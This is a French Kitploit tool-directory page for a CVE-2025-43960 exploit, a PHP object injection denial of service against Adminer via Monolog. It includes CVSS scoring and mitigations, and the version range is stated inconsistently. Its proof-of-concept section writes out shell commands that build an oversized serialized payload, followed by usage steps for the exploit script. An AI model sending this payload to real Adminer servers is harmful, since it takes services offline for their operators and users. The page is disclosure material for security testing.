Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-43960 — Exploit d'injection d'objet PHP pour Adminer <4.8.1 via Monolog, provoquant un déni de service via des payloads sérialisés forgés. Inclut PoC, score CVSS et conseils d'atténuation. | Kitploit
Outils/GitHubGitHub/far00t01/cve-2025-43960
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications Web
GitHubfar00t01/cve-2025-43960

CVE-2025-43960

Exploit d'injection d'objet PHP pour Adminer <4.8.1 via Monolog, provoquant un déni de service via des payloads sérialisés forgés. Inclut PoC, score CVSS et conseils d'atténuation.

Voir le dépôt
13il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-43960 - Injection d'objets PHP dans Adminer < 4.8.1 via Monolog - Déni de service (DoS)

Après des mois d'attente d'une réponse de MITRE, j'ai obtenu CVE-2025-43960 avec une attaque par injection d'objets PHP contre le service Adminer (<4.8.1), provoquant un déni de service (DoS) par manipulation de la mémoire.

https://github.com/user-attachments/assets/ebf7d8e8-01db-4d02-bb12-33321c749458

Résumé

Cette vulnérabilité permet à des attaquants distants non authentifiés d'exploiter les instances d'Adminer 4.8.1 utilisant Monolog, provoquant un déni de service (DoS) par injection d'objets PHP. Le vecteur d'attaque ne nécessite ni authentification ni interaction de l'utilisateur, ce qui en fait un problème de haute gravité (CVSS 7.5) avec un potentiel d'escalade à 8.6 dans certains environnements partagés.

Description suggérée

Adminer 4.8.1, lorsqu'il utilise Monolog pour la journalisation, permet un déni de service (consommation mémoire) via une charge utile sérialisée malveillante telle qu'une chaîne s:1000000000, c'est-à-dire un problème d'injection d'objets PHP. La vulnérabilité affecte les instances d'Adminer utilisant Monolog pour la journalisation, où des entrées utilisateur non fiables sont désérialisées sans validation appropriée. En envoyant un objet désérialisé volumineux, un attaquant peut forcer une consommation mémoire élevée, rendant l'interface Adminer non réactive et provoquant un DoS généralisé du serveur.

  • Bien que le serveur puisse récupérer après plusieurs minutes, plusieurs requêtes simultanées peuvent provoquer un crash complet, nécessitant une intervention manuelle pour restaurer le service.

Score CVSS v3.1

Score de base : 7.5 (Élevé)
Vecteur : AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Remarque sur les déploiements spécifiques :

Si le crash d'Adminer perturbe également d'autres services/locataires (par exemple, conteneur ou processus partagé), Scope : Changé peut s'appliquer :

  • Vecteur : AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
  • Score : 8.6 (Élevé)

Informations supplémentaires

Mesures d'atténuation potentielles

  • Évitez d'utiliser unserialize() sur des données non fiables dans Adminer et Monolog.
  • Appliquez des limites de mémoire (memory_limit) en PHP pour éviter une consommation excessive de ressources.
  • Utilisez allowed_classes dans unserialize() pour restreindre la désérialisation des classes non autorisées.

Fournisseur du produit

  • Adminer

Code de base du produit affecté

  • Adminer < 4.8.1 (dernière version stable au moment des tests)

Composant affecté

  • Intégration de Monolog dans Adminer

Fonctionnalité problématique

  • Injection d'objets PHP via unserialize()

Zone potentiellement affectée

  • Toute instance d'Adminer où la journalisation basée sur Monolog est utilisée

Preuve de concept (PoC)

Génération de la charge utile :

root@kitploit:~
head -c 1000000000 </dev/zero | tr '\0' 'D' > filler.txt
root@kitploit:~
echo 'O:32:"Monolog\\Handler\\SyslogUdpHandler":2:{
   s:9:"*socket";r:2;
   s:10:"*handler";s:1000000000:"'$(cat filler.txt)'";
 }' > payload.txt

Impact :

  • Le serveur entre dans un état de chargement, rendant Adminer inaccessible.
  • Le frontend disparaît complètement lorsque la connexion est active.
  • Lorsque l'attaque cesse, le serveur récupère après quelques minutes, sauf si plusieurs machines sont utilisées (scénario DDoS).

Prérequis d'installation

  • Python : Assurez-vous d'avoir Python 3.x installé. Vous pouvez le vérifier en exécutant python3 --version dans votre terminal.

Dépendances Python

  • Flask : Utilisé pour exécuter le serveur HTTP local qui sert la charge utile.
  • requests : Utilisé pour interagir avec l'application cible pendant le processus d'exploitation.

Installation

root@kitploit:~
git clone https://github.com/far00t01/CVE-2025-43960
cd CVE-2025-43960 
pip install -r requirement.txt
python3 cve-2025-43960.py

Utilisation de l'exploit :

root@kitploit:~
python3 cve-2025-43960.py 

Usage: cve-2025-43960.py <ip-listener> <port-listener> <ip-victim:port>
Example: python3 cve-2025-43960.py 198.51.100.11 80 203.0.113.11:8000

Références

  • https://www.adminer.org
  • https://github.com/vrana/adminer
  • https://github.com/Seldaek/monolog
  • https://www.cvedetails.com/product/44183/Adminer-Adminer.html?vendor_id=17755
  • https://cwe.mitre.org/data/definitions/502.html
  • https://cwe.mitre.org/data/definitions/400.html
  • https://cwe.mitre.org/data/definitions/789.html

Découvreur

Fabian Rosales (@far00t01) Medium.

Télécharger l’outil